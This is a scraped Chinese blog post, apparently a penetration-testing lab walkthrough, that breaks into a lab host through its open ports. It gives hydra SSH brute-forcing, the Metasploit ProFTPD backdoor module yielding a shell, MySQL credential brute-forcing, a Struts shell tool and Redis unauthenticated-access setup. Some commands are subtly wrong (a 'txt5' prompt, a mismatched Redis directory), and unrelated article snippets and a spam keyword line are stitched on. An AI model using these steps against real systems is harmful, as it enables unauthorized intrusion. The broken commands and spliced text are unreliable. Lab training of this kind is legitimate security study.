<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    常見的端口漏洞入侵主機

    VSole2022-01-12 22:35:28

    涉及知識點

    端口漏洞利用

    當我們滲透一個網站時發現從網站滲透不進去的時候,就可以查看該網站主機開啟了哪些端口,來從其開啟的端口來進行入侵

    一旦端口開放的話就可以從外部訪問,操作系統都有或多或少的漏洞,特殊的請求或者指令觸發之后就可以提升權限

    實驗環境

    同一網段的兩臺主機:

    入侵主機:kali

    目標主機ip:192.168.31.69

    使用kali和它本身自帶的一些工具對受害主機進行入侵

    先利用nmap對受害主機進行掃描查看其開啟了哪些端口和服務

    訪問該ip發現80端口是一個phpinfo頁面,無法利用80端口入侵

    所以我們開始嘗試從其他端口入侵該主機

    22端口漏洞利用

    發現其開啟了22端口,22端口是SSH遠程登錄協議。最有可能利用的是弱口令的入侵。

    使用kali自帶hydra來進行暴力破解22端口

    暴力破解ssh命令:

    hydra -L /root/桌面/username.txt -P /root/桌面/password.txt -vV -o ssh.log -e ns -f 192.168.31.69 ssh
    

    參數詳解:

    -L //暴力破解用戶名字典

    -P //暴力破解密碼字典

    -o ssh.log //輸出到這個文件里

    -vV //顯示過程

    -f //搜到賬號密碼就停止

    經過一段時間的等待發現功夫不負有心人,還真破解出了22端口的登錄賬號密碼

    然后我們就可以使用破解出來的賬號密碼成功利用22端口遠程登錄主機并且發現是root權限

    21端口漏洞利用

    通過nmap掃描知道21端口開啟的ftp版本是ProFTPD 1.3.3c,百度發現ProFTPD 1.3.3c有個后門命令執行漏洞

    啟動msfconsole

    搜索ProFTPD 1.3.3c查看其漏洞模塊

    search ProFTPD 1.3.3c
    

    切換到該漏洞模塊下,并設置好目標ip

    use exploit/unix/ftp/proftpd_133c_backdoor
    set RHOSTS 192.168.31.69
    run
    

    成功反彈shell會話

    3306端口漏洞利用

    發現該主機還開啟了3306端口,那么我們如何利用3306端口入侵目標主機呢?

    3306端口是MySQL的默認端口,入侵者可以通過入侵3306端口來入侵我們的主機,在Metasploitable系統中,Mysql的身份認證存在漏洞,這個漏洞可以讓攻擊者不必提供正確的身份證書便可訪問Mysql數據庫

    啟動msfconsole

    掃描mysql模塊

    msf5 > search mysql

    選擇MySQL可用模塊,在模塊中選擇滲透工具模塊進行攻擊

    這里我們切換到mysql掃描模塊,設置模塊有效選項

    msf5 > use auxiliary/scanner/mysql/mysql_login
    msf5 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.31.69 #設置目標ip
    txt5 auxiliary(scanner/mysql/mysql_login) > set USER_FILE /root/桌面/username.txt #設置用戶名字典
    txt5 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/桌面/password.txt #設置密碼字典
    msf5 auxiliary(scanner/mysql/mysql_login) > set STOP_ON_SUCCESS true #破解成功時停止
    msf5 auxiliary(scanner/mysql/mysql_login) >run #開始爆破
    

    成功爆破出MySQL用戶名密碼

    利用爆破出的賬號密碼成功登錄MySQL數據庫

    8080端口入侵

    發現8080端口有一個網站Struts,百度發現Struts可以使用Struts Scan工具獲得指定漏洞交互式shell

    下載Struts Scan解壓,并切換到struts-scan-master目錄下

    執行root@kali:~/桌面/struts-scan-master# python struts-scan.py

    出現如下界面則安裝成功

    使用給出的指定漏洞交互shell執行payload

    成功獲得交互式shell

    6379端口漏洞入侵

    該主機還開啟了6379端口,發現6379端口可以利用Redis未授權訪問漏洞來入侵

    在本地下載Redis并解壓安裝

    wget http://download.redis.io/releases/redis-4.0.8.tar.gz
    tar xzf redis-4.0.8.tar.gz
    cd redis-3.2.0
    make
    

    修改配置文件,使可以遠程訪問

    在bind 127.0.0.1前面加上#將其注釋掉

    把protected-mode后面的yes設為no

    啟動redis-server

    ./src/redis-server redis.conf     
    

    如果報錯執行下列命令

    cd /root/redis-4.0.8/src
    

    然后連接redis發現成功連接

    漏洞mysql
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    在日常滲透過程中我們經常會和數據庫打交道,其中很多時候都與Mysql數據庫有關,Mysql的提權,寫入webshell、數據庫用戶權限提升等
    服務器的相關信息(真實ip,系統類型,版本,開放端口,WAF等) 網站指紋識別(包括,cms,cdn,證書等),dns記錄 whois信息,姓名,備案,郵箱,電話反查(郵箱丟社工庫,社工準備等) 子域名收集,旁站,C段等 google hacking針對化搜索,pdf文件,中間件版本,弱口令掃描等 掃描網站目錄結構,爆后臺,網站banner,測試文件,備份等敏感文件泄漏等 傳輸協議,通用漏洞,ex
    ?上整理的?試問題?全,有些 HW ?試的題,已經收集好了,提供給?家。
    漏洞概述MySQL JDBC是Oracle開發的針對MySQL數據庫操作的統一接口。近日網上爆出了MySQL JDBC存在XXE漏洞漏洞編號為CVE-2021-2471,影響MySQL JDBC v8.0.27版本之前版本。
    MYSQL JDBC XXE漏洞分析
    2021-10-26 09:02:17
    最近 JDBC爆了一個XXE漏洞,很久沒有分析漏洞了,趁著周末沒事分析下這個漏洞。 分析 10月21日,”阿里云應急響應”公眾號發布Oracle Mysql JDBC存在XXE漏洞,造成漏洞的原因主要是因為getSource方法未對傳入的XML格式數據進行檢驗。導致攻擊者可構造惡意的XML數據引入外部實體。造成XXE攻擊。
    復現 Mysql LOAD DATA INFILE 讀取客戶端任意文件漏洞
    搭建MySQL惡意服務器讀取文件這件事,雖然直接利用門檻較高,但是由于在網上看到了一種比較新穎的利用方式,個人覺得比較有意思,總結了一下攻擊原理以及攻擊方式,因此就有了這篇文章。原理在闡述具體原理之前,先介紹幾個SQL語句,以便后文理解首先在tmp目錄下新建一個tmp.txt內容如下:然后執行下方SQL語句,即可將tmp.txt文件導入其中mysql>?
    Mysql攻擊總結
    2021-11-17 04:43:35
    Mysql數據庫在無論是在滲透測試還是正常使用都是比較常見的數據庫,周末沒事做,順便總結梳理了mysql近些年的常見攻擊利用方法。 0x01 簡單介紹 MySQL 是最流行的關系型數據庫管理系統,在 WEB 應用方面 MySQL 是最好的 RDBMS(Relational Database Management System:關系數據庫管理系統)應用軟件之一。 0x02 基礎指令 在mysql
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类